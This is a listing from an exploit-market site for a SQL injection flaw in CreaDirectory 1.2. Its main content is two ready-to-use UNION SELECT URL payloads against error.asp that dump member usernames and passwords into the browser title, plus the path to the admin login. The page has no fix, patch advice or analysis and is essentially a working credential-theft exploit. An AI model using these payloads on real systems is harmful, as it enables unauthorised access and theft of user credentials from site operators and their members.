[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability

Author
CyberGhost
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1782
Category
web applications
Date add
18-04-2007
Platform
unsorted
===================================================================
CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability
===================================================================



#Title  : CreaDirectory v1.2 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.creadirectory.com
#Script Page : http://www.creascripts.com/creadirectory.asp

#Vuln.

#Username : /error.asp?id=-1+union+select+0,1,2,user_name,4,5,6,7,8,9,0,1,2,3,4,5+from+members
#Password : /error.asp?id=-1+union+select+0,1,2,ipassword,4,5,6,7,8,9,0,1,2,3,4,5+from+members

#Admin Login : /admin.asp

#Info : Username and Password in browser title !
====================================




#  0day.today [2024-12-24]  #